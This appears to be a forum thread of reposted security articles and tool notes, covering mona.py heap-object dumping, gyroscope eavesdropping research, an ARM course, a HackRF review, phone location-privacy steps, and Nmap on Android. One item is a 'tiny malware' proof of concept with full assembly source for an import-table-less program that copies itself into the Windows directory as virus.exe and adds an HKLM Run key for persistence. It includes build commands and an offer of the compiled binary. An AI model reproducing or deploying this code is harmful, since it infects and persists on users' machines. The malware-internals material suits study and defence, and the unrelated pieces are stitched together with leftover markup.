[COLOR=#5576D1]module[/COLOR] info table, hang on... - Processing modules - Done. Let's rock 'n roll. 
>> [URL="http://www.ruby-doc.org/docs/rdoc/1.9/classes/Object.html"]Object[/URL] at 0x023a1bc0 (0x78 bytes): Offset Address Contents Info ------ ------- -------- ----- +00 0x023a1bc0 | 0x023a1d30 (Heap) ptr to ASCII '0::' +04 0x023a1bc4 | 0x023a1818 (Heap) ptr to ASCII ':' +08 0x023a1bc8 | 0x00000000 +0c 0x023a1bcc | 0x023a1d3c (Heap) ptr to 0x77e46464 : ADVAPI32!g_CodeLevelObjTable+0x4 +10 0x023a1bd0 | 0x023a1824 (Heap) ptr to ASCII ':' +14 0x023a1bd4 | 0xbaadf00d +18 0x023a1bd8 | 0x00020000 = UNICODE ' ' +1c 0x023a1bdc | 0x00000001 +20 0x023a1be0 | 0x00160014 = UNICODE '' +24 0x023a1be4 | 0x023a1a38 (Heap) ptr to UNICODE 'Basic User' +28 0x023a1be8 | 0x013a0138 (Heap) ptr to ASCII 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...' +2c 0x023a1bec | 0x023a1a68 (Heap) ptr to UNICODE 'Allows programs to execute as a user that does [COLOR=#5576D1]not[/COLOR] have Administrator [COLOR=#5576D1]or[/COLOR] Power User access rights, but can still access resouces accessible by normal users.' 
+30 0x023a1bf0 | 0x00000000 +34 0x023a1bf4 | 0x00000001 +38 0x023a1bf8 | 0x023a18a8 (Heap) ptr to 0x00000101 : +3c 0x023a1bfc | 0x00000000 +40 0x023a1c00 | 0x00000000 +44 0x023a1c04 | 0x00000007 +48 0x023a1c08 | 0x00000007 +4c 0x023a1c0c | 0x023a18d0 (Heap) ptr to ASCII ' :H:[COLOR=#00008b]p[/COLOR]:' +50 0x023a1c10 | 0x00000000 +54 0x023a1c14 | 0x00000000 +58 0x023a1c18 | 0x00000000 +5c 0x023a1c1c | 0x00000000 +60 0x023a1c20 | 0x00000000 +64 0x023a1c24 | 0x00000000 +68 0x023a1c28 | 0x00000000 +6c 0x023a1c2c | 0x00000000 +70 0x023a1c30 | 0x00000000 +74 0x023a1c34 | 0x00000000 >> [URL="http://www.ruby-doc.org/docs/rdoc/1.9/classes/Object.html"]Object[/URL] at 0x023a1d3c (0x28 bytes): Offset Address Contents Info ------ ------- -------- ----- +00 0x023a1d3c | 0x77e46464 ADVAPI32!g_CodeLevelObjTable+0x4 +04 0x023a1d40 | 0x023a1bcc (Heap) ptr to ASCII '<:$:' +08 0x023a1d44 | 0xbaadf00d +0c 0x023a1d48 | 0x00040000 = UNICODE ' ' +10 0x023a1d4c | 0x00000101 +14 0x023a1d50 | 0x001a0018 = UNICODE '' +18 0x023a1d54 | 0x023a1c50 (Heap) ptr to UNICODE 'Unrestricted' +1c 0x023a1d58 | 0x0090008e (Heap) ptr to ASCII 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...' +20 0x023a1d5c | 0x023a1c88 (Heap) ptr to UNICODE 'Software access rights are determined by the access rights of the user.' 
+24 0x023a1d60 | 0x00000000 >> [URL="http://www.ruby-doc.org/docs/rdoc/1.9/classes/Object.html"]Object[/URL] at 0x023a18a8 (0x28 bytes): Offset Address Contents Info ------ ------- -------- ----- +00 0x023a18a8 | 0x00000101 +04 0x023a18ac | 0x05000000 +08 0x023a18b0 | 0x0000000a +0c 0x023a18b4 | 0xabababab +10 0x023a18b8 | 0xabababab +14 0x023a18bc | 0xfeeefeee +18 0x023a18c0 | 0x00000000 +1c 0x023a18c4 | 0x00000000 +20 0x023a18c8 | 0x0005000a = UNICODE '' +24 0x023a18cc | 0x051807c2 [+] This mona.py action took 0:00:00.640000 As you can see in the output above, mona determined that the source object contained references to 2 linked objects, and decided to dump those linked object as well. It’s important to know that mona won’t consider strings (ASCII or Unicode) as objects, because mona already shows the strings, even if they are referenced inside the object. The output of the dumpobj command is written to a text file called "dumpobj.txt". For your info, the output of !mona info -a <address> includes the output of mona dumpobj (without printing recursive objects). If you want to understand what exactly a given address is, you’ll get something like this: 0:001> !py mona info -a 0x023a1bc0 Hold on... [+] Generating [COLOR=#5576D1]module[/COLOR] info table, hang on... - Processing modules - Done. Let's rock 'n roll. 
[+] NtGlobalFlag: 0x00000070 0x00000040 : +hpc - Enable Heap Parameter Checking 0x00000020 : +hfc - Enable Heap Free Checking 0x00000010 : +htc - Enable Heap Tail Checking [+] Information about address 0x023a1bc0 {PAGE_READWRITE} Address is part of page 0x013c0000 - 0x023a2000 This address resides [COLOR=#5576D1]in[/COLOR] the heap Address 0x023a1bc0 found [COLOR=#5576D1]in[/COLOR] _HEAP @ 00240000, Segment @ 013c0040 ( bytes ) (bytes) HEAP_ENTRY Size PrevSize Unused Flags UserPtr UserSize Remaining - state 023a1bb8 00000090 00000158 00000018 [07] 023a1bc0 00000078 00000010 Fill pattern,Extra present,Busy ([COLOR=#00008b]hex[/COLOR]) 00000144 00000344 00000024 00000120 00000016 Fill pattern,Extra present,Busy (dec) Chunk header size: 0x8 (8) Size initial allocation request: 0x78 (120) Total space [COLOR=#5576D1]for[/COLOR] data: 0x88 (136) Delta between initial size [COLOR=#5576D1]and[/COLOR] total space [COLOR=#5576D1]for[/COLOR] data: 0x10 (16) [URL="http://www.ruby-doc.org/docs/rdoc/1.9/classes/Data.html"]Data[/URL] : 30 1d 3a 02 18 18 3a 02 00 00 00 00 3c 1d 3a 02 24 18 3a 02 0d f0 ad ba 00 00 02 00 01 00 00 00 ... 
---------------------------------------------------- [+] Dumping object at 0x023a1bc0, 0x90 bytes [+] Preparing output file 'dumpobj.txt' - (Re)setting logfile c:\logs\HeapAlloc2\dumpobj.txt >> [URL="http://www.ruby-doc.org/docs/rdoc/1.9/classes/Object.html"]Object[/URL] at 0x023a1bc0 (0x90 bytes): Offset Address Contents Info ------ ------- -------- ----- +00 0x023a1bc0 | 0x023a1d30 (Heap) ptr to ASCII '0::' +04 0x023a1bc4 | 0x023a1818 (Heap) ptr to ASCII ':' +08 0x023a1bc8 | 0x00000000 +0c 0x023a1bcc | 0x023a1d3c (Heap) ptr to 0x77e46464 : ADVAPI32!g_CodeLevelObjTable+0x4 +10 0x023a1bd0 | 0x023a1824 (Heap) ptr to ASCII ':' +14 0x023a1bd4 | 0xbaadf00d +18 0x023a1bd8 | 0x00020000 = UNICODE ' ' +1c 0x023a1bdc | 0x00000001 +20 0x023a1be0 | 0x00160014 = UNICODE '' +24 0x023a1be4 | 0x023a1a38 (Heap) ptr to UNICODE 'Basic User' +28 0x023a1be8 | 0x013a0138 (Heap) ptr to ASCII 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...' +2c 0x023a1bec | 0x023a1a68 (Heap) ptr to UNICODE 'Allows programs to execute as a user that does [COLOR=#5576D1]not[/COLOR] have Administrator [COLOR=#5576D1]or[/COLOR] Power User access rights, but can still access resouces accessible by normal users.' 
+30 0x023a1bf0 | 0x00000000 +34 0x023a1bf4 | 0x00000001 +38 0x023a1bf8 | 0x023a18a8 (Heap) ptr to 0x00000101 : +3c 0x023a1bfc | 0x00000000 +40 0x023a1c00 | 0x00000000 +44 0x023a1c04 | 0x00000007 +48 0x023a1c08 | 0x00000007 +4c 0x023a1c0c | 0x023a18d0 (Heap) ptr to ASCII ' :H:[COLOR=#00008b]p[/COLOR]:' +50 0x023a1c10 | 0x00000000 +54 0x023a1c14 | 0x00000000 +58 0x023a1c18 | 0x00000000 +5c 0x023a1c1c | 0x00000000 +60 0x023a1c20 | 0x00000000 +64 0x023a1c24 | 0x00000000 +68 0x023a1c28 | 0x00000000 +6c 0x023a1c2c | 0x00000000 +70 0x023a1c30 | 0x00000000 +74 0x023a1c34 | 0x00000000 +78 0x023a1c38 | 0xabababab +7c 0x023a1c3c | 0xabababab +80 0x023a1c40 | 0x00000000 +84 0x023a1c44 | 0x00000000 +88 0x023a1c48 | 0x00120007 = UNICODE '' +8c 0x023a1c4c | 0x051e0752 [+] Disassembly: Instruction at 023a1bc0 : XOR BYTE PTR [B]dumplog (dl)[/B] It is clear that the dumpobj command will make it easier to visualize important information inside an object. This is certainly helpful if you already know the starting object. What if you have been logging all Heap allocations and free operations in the application and storing the output in a log file? Even a few lines of javascript code can be quite noisy from a Heap perspective, making it less trivial to identify interesting objects. To make our lives easier, I decided to implement "dumplog", which will parse a log file (based on a certain syntax) and perform a "dumpobj" on each object that has been allocated, but not freed. In the current version, dumplog will not dump linked objects, but I plan on adding this feature soon. (probably tomorrow) Dumplog requires a proper setup. We need to tell WinDBG to create a log file that follows a specific convention, and we obviously must run mona dumplog in the same debug session (to make sure the logged allocations and free operations are still relevant). 
The output of "!py mona help dumplog" shows this: Usage of command 'dl' : ------------------------ Dump all objects recorded in an alloc/free log Note: dumplog will only dump objects that have not been freed in the same logfile. Expected syntax for log entries: Alloc : 'alloc(size in hex) = address' Free : 'free(address)' Additional text after the alloc & free info is fine. Just make sure the syntax matches exactly with the examples above. Arguments: -f [COLOR=#5576D1]<[/COLOR][COLOR=#800000]path[/COLOR]/[COLOR=#ff0000]to[/COLOR]/[COLOR=#ff0000]logfile[/COLOR][COLOR=#5576D1]>[/COLOR] : Full path to the logfile The idea is to log all Heap allocations and free operations to a log file. In WinDBG this can be achieved using the following steps: Before running the process and triggering the alloc/free operations that you want to capture and analyze, tell WinDBG to write the output of the log window to a text file: .logclose .logopen c:\\allocs.txt Next, set up 2 logging breakpoints: bp !ntdll + 0002e12c ".printf \"alloc(0x%x) = 0x%p\", poi(esp+c), eax; .echo; g" bp ntdll!RtlFreeHeap "j (poi(esp+c)!=0) '.printf \"free(0x%p)\", poi(esp+c); .echo; g'; 'g';" (based on a recent version of kernel32.dll, Windows 7 SP1). These 2 breakpoints will print a message to the WinDBG log window each time RtlAllocateHeap and RtlFreeHeap are called, printing out valuable information about the API call. It’s important to stick to this format, but you are free to add more text to the end of the message string. With these 2 breakpoints active, and WinDBG configured to start writing the output of the log window to a text file, we can run the application. When you’re ready to do analysis, break WinDBG. Don’t close it at this point, but close the log file using the .logclose command. We can now use mona to parse the log file, find the objects that have been allocated and not freed, and perform a mona dumpobj on each of those objects. 
!py mona dl -f c:\allocs.txt The output will be written to dump_alloc_free.txt I hope you’ll enjoy these 2 new features. Stay safe & take care cheers -corelanc0d3r Sursa: https://www.corelan.be/index.php/2014/08/16/analyzing-heap-objects-with-mona-py/
  14. [h=1]Hackers transform a smartphone gyroscope into an always-on microphone[/h]by Steve Dent | @Stevetdent | 2 days ago Apps that use your smartphone's microphone need to ask permission, but the motion sensors? No say-so needed. That might not sound like a big deal, but security researchers from Stanford University and defense firm Rafael have discovered a way to turn Android phone gyroscopes into crude microphones. They call their app " " and here's how it works: the tiny gyros in your phone that measure orientation do so using vibrating pressure plates. As it turns out, they can also pick up air vibrations from sounds, and many Android devices can do it in the 80 to 250 hertz range -- exactly the frequency of a human voice. By contrast, the iPhone's sensor only uses frequencies below 100Hz, and is therefore useless for tapping conversations. Though the researchers' system can only pick up the odd word or the speaker's gender, they said that voice recognition experts could no doubt make it work better. They'll be delivering a paper next week at the Usenix Security conference, but luckily, Google is already up on the research. "This early, academic work should allow us to provide defenses before there is any likelihood of real exploitation." Via: Wired.com Source: Stanford University
  15. ARM: Introduction to ARM
by David Thomas on 03 March 2012

Introduction
The Introduction to ARM course aims to bring the reader up to speed on programming in ARM assembly language. Its goal is not to get you to write entire programs in ARM assembly language, but instead to give you enough knowledge to make judicious use of it. While you might never routinely come into contact with assembly language, there are a number of reasons for delving down to the assembly level:
- You might want to improve the performance of speed-critical portions of your code,
- You might be debugging, trying to solve a problem which is not obvious from the source code alone,
- Or, you might just be curious.

Limitations
The course was written with application programmers in mind, rather than systems programmers. As such the content is geared towards the ‘user mode’ world. Vectors, exceptions, interrupts and processor modes are not presently discussed.

Navigation
Move between pages using the arrows at the bottom of the page. Begin reading here.

Further Reading
This is the first part of a two-part ARM training course; the second is called Efficient C for ARM and is available here.

Link: ARM: Introduction to ARM: Start | DaveSpace
  16. HackRF Initial Review

The HackRF One is a new software defined radio that has recently been shipped out to Kickstarter funders. It is a transmit- and receive-capable SDR with an 8-bit ADC, a 10 MHz to 6 GHz operating range and up to 20 MHz of bandwidth. It can now be preordered for $299 USD. We just received ours from backing the Kickstarter and here's a brief review of the product. We didn't do any quantitative testing and this is just a first impressions review. So far we've only tested receive on Windows with SDR#.

Unboxing
Inside the box is the HackRF unit in a quality protective plastic casing, a telescopic antenna and a USB cable. We show an RTL-SDR next to the HackRF for size comparison.
HackRF + Telescopic Antenna + USB Cable + Box (RTL-SDR Dongle Shown for Size Comparison)
Back of the box

HackRF Windows SDR# Installation Process
Installation of the HackRF on Windows is very simple and is the same process as installing an RTL-SDR dongle. Assuming you have SDR# downloaded, simply plug your HackRF into a USB port, open zadig in the SDR# folder, select the HackRF and click install driver. The HackRF is now ready to use with SDR#.

Initial Receive Review
We first tested the HackRF at its maximum bandwidth of 20 MHz in SDR#. Unfortunately at this sample rate the PC we used (Intel i5 750) could not keep up. The waterfall and audio were very choppy, even when the waterfall and spectrum analyser were turned off. After switching to the next lowest bandwidth of 16 MHz everything was fine. With the waterfall resolution set to 65536 the CPU usage was at around 45-50%.

It is very nice to have such a wide bandwidth at your disposal. However, the drawback is that with such a wide bandwidth it is very difficult to find a narrowband signal on the waterfall if the frequency is unknown. This might make things difficult for people new to signal browsing.
Also, since the bandwidth is so wide, the waterfall resolution when zoomed in is very poor, making it difficult to see a clear signal structure; this is more a problem with SDR# than with the HackRF.

The included antenna is good and of a high quality build. There is a spring in the base of the antenna which may be an inductor, or may just be there for mechanical reasons. As the antenna screws directly into the HackRF body there is no place for a ground plane.

The HackRF has no front end filtering (preselectors), so many images of strong signals show up at multiples of the selected sample rate. Most wideband SDRs are like this, but these images are also not helped by the low 8-bit ADC resolution. Image rejection and sensitivity could be improved by using your own preselector front end, like many people have done with the RTL-SDR. Overall reception sensitivity seems to be very similar to the RTL-SDR.

There are three gain settings available for the HackRF in SDR#: one for LNA gain, one for VGA gain and a check box for 'Amp'. The LNA gain is the main gain that should be used; usually only a small amount of VGA gain is needed, as VGA gain seems to increase the noise by the same amount as the signal. We're not sure what 'Amp' is, but it seems to do something similar to 'RTL AGC' on the RTL-SDR.

We checked the PPM offset against a known signal and found that the offset was -12 ppm, which is pretty good. Only about 1 ppm of thermal drift was seen throughout the operation of the HackRF.

Overall the HackRF is a good product and is great for those who want the massive frequency range, wide bandwidth and transmit capability. But if you are interested in reception only and are looking for a wide bandwidth SDR upgrade to the RTL-SDR, I would suggest waiting for the Airspy to be released. The advantage of the Airspy will be its 12-bit ADC and cheaper price.
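For readers new to SDRs, the -12 ppm offset quoted above is easy to put into concrete terms: the tuning error in Hz is simply the tuned frequency multiplied by the offset in parts per million. A quick illustrative sketch (the 100 MHz figure is just an example, not from the review):

```python
# Frequency error caused by an oscillator offset given in parts per million (ppm).
def ppm_error_hz(tuned_hz, ppm):
    return tuned_hz * ppm / 1e6

# A -12 ppm offset while tuned to 100 MHz puts the signal about 1.2 kHz
# below where the software thinks it is.
print(ppm_error_hz(100e6, -12))  # -1200.0
```

The roughly 1 ppm of thermal drift mentioned above would correspondingly move a 100 MHz signal by only about 100 Hz.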
Airspy has entered production now and the first batch of 500 units should soon be available.

Here are some example wide band signals received with the HackRF:

HackRF Receiving the entire WFM band
HackRF Receiving a DVB-T Signal
HackRF Receiving in the GSM Band
HackRF Possibly Receiving LTE?
HackRF at 2.4 GHz – Must be WiFi?
HackRF Receiving the entire AM Radio Band

Here is another review by a YouTube user who focuses on HF reception: HackRF One on Windows with SDR#

Here is an older review comparing the specs of the HackRF against the BladeRF and USRP B200.

Sursa: HackRF Initial Review - rtl-sdr.com
  17. Change This iPhone Setting To Stop Closed Apps From Tracking Your Location

Foursquare users who play hooky from work to go see a movie may not "check in" for fear of colleagues seeing their whereabouts, but the app still knows they're there. Last week, the Wall Street Journal confirmed an earlier report that Foursquare "tracks your every movement, even when the app is closed." Foursquare is far from the only app doing this. On my phone there were 14 other apps passively tracking my location, including a theft recovery app that needs to know where the phone is in case it's stolen from me. Other apps track users' locations even when the app is not actively running to gather intelligence for better advertising and personalization. Android users have to force quit the application running in the background to avoid it.

For iPhone users, the passive tracking relies on a feature called "Background App Refresh." If you're a Machead who doesn't like the idea of closed apps being able to track you, you should make a change to your settings, as this is on by default. Go to your settings. Ignore the privacy option. You can turn off "location services" for apps there, but to get to the passive tracking, head to the "General" area. Choose "Background App Refresh." Turn it off entirely (which is good for battery life) or pick and choose the apps you trust not to abuse their "background power." Those apps that passively track location have a little blue arrow next to them. Choose wisely.

Sursa: Change This iPhone Setting To Stop Closed Apps From Tracking Your Location - Forbes
  18. Web-fu - the ultimate web hacking Chrome extension

Web-fu is a web hacking tool focused on discovering and exploiting web vulnerabilities.

BROWSER INTEGRATION
This tool has many advantages: it is a Chrome extension, and therefore if the browser can authenticate and access the web application, the tool can too. The integration with Chrome makes for a very comfortable and agile way of web hacking, and you have all the application data loaded in the hacking tool; you don't need to copy the URL, cookies, etc. to the tool: just right click and hack. The browser's rendering engine is also used by this tool to draw the HTML of the responses.

FALSE POSITIVES
When I coded this tool, I was obsessed with false positives, which are the main problem in all detection tools. I have implemented a Gauss algorithm to reduce the false positives automatically, which works very well and saves a lot of time for the pentester.

Link: software security blog: Web-fu - the ultimate web hacking chrome extension
  19. Tiny Malware PoC: Malware Without IAT, DATA OR Resource Section
Submitted by siteadm on Wed, 08/13/2014 - 21:58

Have you ever wondered about having an EXE without any entry in the IAT (Import Address Table) at all? Well, I knew that it's possible, but I had never seen an actual EXE file without an IAT entry. So I developed an application which is 1,536 bytes and still does basic annoying malware things. So to summarize, this tiny app:

- Enumerates the following APIs:
  Kernel32: GetProcAddress, VirtualAlloc, GetModuleFileNameA, ExitProcess, CopyFileA, GetWindowsDirectoryA, LoadLibraryA
  Advapi32: RegCreateKeyA, RegSetKeyValueA, RegCloseKey
  User32: MessageBoxA
- Allocates 0x0B000 bytes at a fixed memory location (0x0C000000)
- Resolves and stores all DLL handles, API function addresses, strings and API call return values in this newly allocated memory page.
- Copies itself to the Windows directory under the name virus.exe
- Creates a startup key in HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run called viri that points to virus.exe in %WINDIR%
- Shows a MessageBox with the "Infected!" string as both title and text of the message.
- Terminates itself

So this is basically what I did; developing it further and extending it is just a matter of time.
Anyway, let's see the code. The beginning of the file just finds the Kernel32 base address and the offset of Kernel32's export table:

section .text
BITS 32
global _start

_start:
    xor ecx,ecx
    mov eax,[fs:ecx+0x30]           ; EAX = PEB
    mov eax,[eax+0xc]               ; EAX = PEB->Ldr
    mov esi,[eax+0x14]              ; ESI = PEB->Ldr.InMemOrder
    lodsd                           ; EAX = Second module
    xchg eax,esi                    ; EAX = ESI, ESI = EAX
    lodsd                           ; EAX = Third module (kernel32)
    mov ebx,[eax+0x10]              ; EBX = Base address
    mov edx,[ebx+0x3c]              ; EDX = DOS->e_lfanew
    add edx,ebx                     ; EDX = PE header
    mov edx,[edx+0x78]              ; EDX = Offset of export table
    add edx,ebx                     ; EDX = Export table
    mov esi,[edx+0x20]              ; ESI = Offset of names table
    add esi,ebx                     ; ESI = Names table
    xor ecx,ecx                     ; ECX = 0

tryagain:
    inc ecx                         ; Loop over each exported function
    lodsd
    add eax,ebx                     ; Loop until the function name matches
    cmp dword [eax],0x50746547      ; GetP
    jnz tryagain
    cmp dword [eax+0x4],0x41636f72  ; rocA
    jnz tryagain
    cmp dword [eax+0x8],0x65726464  ; ddre
    jnz tryagain
    mov esi,[edx+0x24]              ; ESI = Offset of ordinals
    add esi,ebx                     ; ESI = Ordinals table
    mov cx,[esi+ecx*2]              ; CX = Ordinal of the function
    dec ecx
    mov esi,[edx+0x1c]              ; ESI = Offset of address table
    add esi,ebx                     ; ESI = Address table
    mov edx,[esi+ecx*4]             ; EDX = Pointer (offset)
    add edx,ebx                     ; EDX = GetProcAddress

As a first step, we try to find the VirtualAlloc API address:

    xor ecx,ecx                     ; ECX = 0
    push 0
    push ebx                        ; Kernel32 base address
    push edx                        ; GetProcAddress
    push ecx                        ; 0
    push 0
    push 0x636f6c6c
    push 0x416c6175
    push 0x74726956                 ; VirtualAlloc
    push esp
    push ebx                        ; Kernel32 base address
    call edx                        ; GetProcAddress
    push eax

As you can see, pushing the string onto the stack and then pushing ESP does the trick. Since I needed to do this so often, I wrote a small Python script to generate this type of assembly instruction for a given string:

import sys

if len(sys.argv) < 2:
    print("Please provide a string argument")
    sys.exit(1)

APIName = sys.argv[1]
if len(APIName) % 4 != 0:
    # Pad to a multiple of 4 with NUL bytes
    APIName = APIName.ljust(((len(APIName) // 4) + 1) * 4, '\0')
print("push 0")
for i in range(1, (len(APIName) // 4) + 1):
    # Emit each dword little-endian, starting from the end of the string
    print("push 0x"
          + "{0:02x}".format(ord(APIName[-(i * 4 - 3)]))
          + "{0:02x}".format(ord(APIName[-(i * 4 - 2)]))
          + "{0:02x}".format(ord(APIName[-(i * 4 - 1)]))
          + "{0:02x}".format(ord(APIName[-(i * 4)])))
print("push esp ;" + APIName)

You can simply run this Python script with a string as parameter and it produces the ASM instructions required for pushing the given string onto the stack. Example call and output:

C:\>APINameToASM.py user32.dll
push 0
push 0x00006c6c
push 0x642e3233
push 0x72657375
push esp ;user32.dll

Now we allocate a fixed-size, fixed-location memory page to store all strings and resolved API pointers:

    push 0x40                       ; DWORD flProtect = PAGE_EXECUTE_READWRITE
    push 0x3000                     ; DWORD flAllocationType = MEM_COMMIT | MEM_RESERVE
    push 0x0B000                    ; SIZE_T dwSize
    push 0x0C000000                 ; LPVOID lpAddress
    call eax                        ; call VirtualAlloc

From now on, we store all resolved API pointers at address 0x0C000000. After running the application, the whole table will look like this:

0x0C000000 => Kernel32 handle
0x0C000004 => GetProcAddress pointer
0x0C000008 => VirtualAlloc pointer
0x0C00000C => GetModuleFileNameA pointer
0x0C000010 => ExitProcess pointer
0x0C000014 => CopyFileA pointer
0x0C000018 => GetWindowsDirectoryA pointer
0x0C00001C => LoadLibraryA pointer
; space for 40 kernel32 function addresses = 40 x 4 = 160 decimal (0xA0)
; 0xA0 + 0x04 = 0xA4 = beginning of Advapi32
0x0C0000A4 => Advapi32 handle
0x0C0000A8 => RegCreateKeyA pointer
0x0C0000AC => RegSetKeyValueA pointer
0x0C0000B0 => RegCloseKey pointer
; space for 40 user32.dll function addresses = 40 x 4 = 160 decimal (0xA0)
; 0xA4 + 0xA4 = 0x148 = beginning of User32
0x0C000148 => User32 handle
0x0C00014C => MessageBoxA pointer

I also used the same memory page to store strings, for example:

0x0C00AEF0 => Current EXE file path (returned by the GetModuleFileName API)
0x0C00ADEC => Windows directory path (returned by the GetWindowsDirectory API)
0x0C00ADE5 => "viri" string (registry value name)
0x0C00AB8C => "Infected!" string

I also created 3 functions to resolve API pointers more easily:

EnumKernelAPI:
    pop ebp                         ; ret addr
    mov ecx, 0x0C000000
    push dword [ecx]                ; kernel32 handle
    call dword [ecx+0x04]           ; GetProcAddress
    mov ecx, 0x0C000000
    push ebp
    retn

EnumAdvapiAPI:
    pop ebp                         ; ret addr
    mov ecx, 0x0C000000
    push dword [ecx+0xA4]           ; advapi32 handle
    call dword [ecx+0x04]           ; GetProcAddress
    mov ecx, 0x0C000000
    push ebp
    retn

EnumUserAPI:
    pop ebp                         ; ret addr
    mov ecx, 0x0C000000
    push dword [ecx+0x148]          ; user32 handle
    call dword [ecx+0x04]           ; GetProcAddress
    mov ecx, 0x0C000000
    push ebp
    retn

You also need to call ExitProcess to prevent crashing, so:

TerminateProcess:
    push 0                          ; dwExitCode
    mov ecx, 0x0C000000
    call dword [ecx+0x10]           ; call ExitProcess

is necessary. After resolving the APIs, calling them is really easy, for example:

    mov ecx, 0x0C000000
    push 1                          ; bFailIfExists = TRUE
    push 0xC00ADEC                  ; %WINDIR%\Virus.exe
    push 0x0C00AEF0                 ; Current EXE path
    call dword [ecx+0x14]           ; CopyFileA

Another call:

    mov ecx, 0xC00ADAC              ; location of subkey
    mov dword [ecx+44], 0x0000006e
    mov dword [ecx+40], 0x75525c6e
    mov dword [ecx+36], 0x6f697372
    mov dword [ecx+32], 0x6556746e
    mov dword [ecx+28], 0x65727275
    mov dword [ecx+24], 0x435c7377
    mov dword [ecx+20], 0x6f646e69
    mov dword [ecx+16], 0x575c7466
    mov dword [ecx+12], 0x6f736f72
    mov dword [ecx+8],  0x63694d5c
    mov dword [ecx+4],  0x65726177
    mov dword [ecx],    0x74666f53  ; Software\Microsoft\Windows\CurrentVersion\Run
    push 0xC00ADE0                  ; PHKEY phkResult
    push 0xC00ADAC                  ; lpSubKey = Software\Microsoft\Windows\CurrentVersion\Run
    push 0x80000002                 ; HKEY = HKEY_LOCAL_MACHINE
    mov ecx, 0x0C000000
    call dword [ecx+0xA8]           ; RegCreateKeyA
    mov ecx, 0x0C000000
    mov dword [ecx+0xADE5], 0x69726976 ; "viri" string, used as the registry value name
    mov edi, 0xC00ADEC              ; Address of the C:\Windows\Virus.exe string
    sub ecx,ecx
    sub al,al
    not ecx
    cld
    repne scasb
    not ecx
    dec ecx                         ; Length of C:\Windows\Virus.exe; instead of hardcoding
                                    ; it, we calculate it dynamically in case Windows is
                                    ; installed in WINNT or under any other name
    mov ebx, 0x0C000000
    mov edi, 0xC00ADEC
    push ecx                        ; DWORD cbData (length of C:\Windows\Virus.exe)
    push edi                        ; LPCVOID lpData (C:\Windows\Virus.exe)
    push 1                          ; DWORD dwType = REG_SZ
    push 0x0C00ADE5                 ; LPCTSTR lpValueName = viri
    push 0                          ; LPCTSTR lpSubKey = NULL (will use the already open key)
    push dword [ebx+0xADE0]         ; HKEY hKey = output of the previous RegCreateKeyA call
    call dword [ebx+0xAC]           ; RegSetKeyValueA
    mov ecx, 0x0C000000
    push dword [ecx+0xADE0]         ; HKEY hKey
    call dword [ecx+0xB0]           ; call RegCloseKey

Anyway, you can see the entire source code here.
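The dword constants written into the subkey buffer above are just the ASCII bytes of the registry path packed little-endian, four at a time. A short Python check (illustrative, independent of the post's code) decodes them back:

```python
import struct

# The dword constants from the listing above, keyed by their buffer offset.
dwords = {
    0: 0x74666F53,  4: 0x65726177,  8: 0x63694D5C, 12: 0x6F736F72,
    16: 0x575C7466, 20: 0x6F646E69, 24: 0x435C7377, 28: 0x65727275,
    32: 0x6556746E, 36: 0x6F697372, 40: 0x75525C6E, 44: 0x0000006E,
}

# Pack each dword little-endian in offset order, then strip the NUL padding.
buf = b"".join(struct.pack("<I", dwords[off]) for off in sorted(dwords))
print(buf.rstrip(b"\x00").decode("ascii"))
# Software\Microsoft\Windows\CurrentVersion\Run
```

This is the same trick the APINameToASM.py helper automates for the API name strings pushed on the stack.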
To compile it you need to run two commands:

nasm -fwin32 IATLess.asm
link /subsystem:windows /entry:start IATLess.obj

No .data section, and no IAT entry (see the PEStudio screenshot).

UPDATE: As requested, I uploaded the compiled file here. Password: infected

Sursa: https://www.codeandsec.com/PoC-Tiny-Malware-Without-IAT-DATA-Or-Resource-Section
  20. Yes, Google Maps is tracking you. Here's how to stop it
VentureBeat

Google is probably logging your location, step by step, via Google Maps. Want to see what kind of data it has on you? Check out Google's own location history map, which lets you see the path you've traced for any given day that your smartphone has been running Google Maps. In the screenshot above, it shows some of my peregrinations around Paris in June of this year.

This location history page has actually been available for several years, since Google first rolled it out as part of Latitude, its now-defunct location-sharing app. Cnet noticed it in December, 2013, TechCrunch picked it up a few days later, and now Junkee.com noticed it last week. We're highlighting it again because it's trivially easy to turn off Google Maps location-tracking, if you want to. In fact, I checked the location history page this morning and had difficulty finding any location data at all, because I've had location tracking turned off for months, with a few exceptions. To turn off location tracking, just follow these easy steps.

How to delete your location history
- View your location history using Google's web page.
- Set a time period to view (up to 30 days at a time).
- Select the period you want to delete.
- Click the "Delete history from this time period" link on the left side of this page.
- If you have multiple Google accounts, check the history for each one.

To turn off location tracking in Android
- Go to the Settings app.
- Scroll down and tap on the Location section.
- Tap Google Location Reporting.
- Switch Location History to "off."
Note: For greater privacy, you can also turn off Location Reporting, but this will keep apps like Google Maps from working properly.

How to turn off location tracking in iOS
- Open the Settings app.
- Scroll down to Privacy, and select Location Services.
- Disable all Location Services by setting the top slider to "off", or scroll down to disable specific apps one by one, such as Google Maps.
Take the steps above, and your location history will look something like mine does, below. For more details, check out this LifeHacker article: PSA: Your phone logs everywhere you go. Here’s how to turn it off. Hat tip: John Koetsier. Above: “You have no location history,” Google says — if you’ve refused to let it log your locations. Sursa: Yes, Google Maps is tracking you. Here's how to stop it - Prismatic
  21. Nmap 6.46 on Android

August 17, 2014

I've just cross-compiled Nmap 6.46 for Android, since I had not done it in a while. If you just need the binary, it's here: http://ftp.linux.hr/android/nmap/nmap-6.46-android-arm-bin.tar.bz2
If you need details, go here: https://secwiki.org/w/Nmap/Android

Building Nmap from source (without SSL)

If you want to build it from source, the process is pretty straightforward:

git clone https://github.com/kost/nmap-android.git
cd nmap-android
cp -a android ~/src/nmap-6.46/
cd ~/src/nmap-6.46/android
# (adjust paths in the Makefile if needed)
make doit

Building Nmap from source (with OpenSSL)

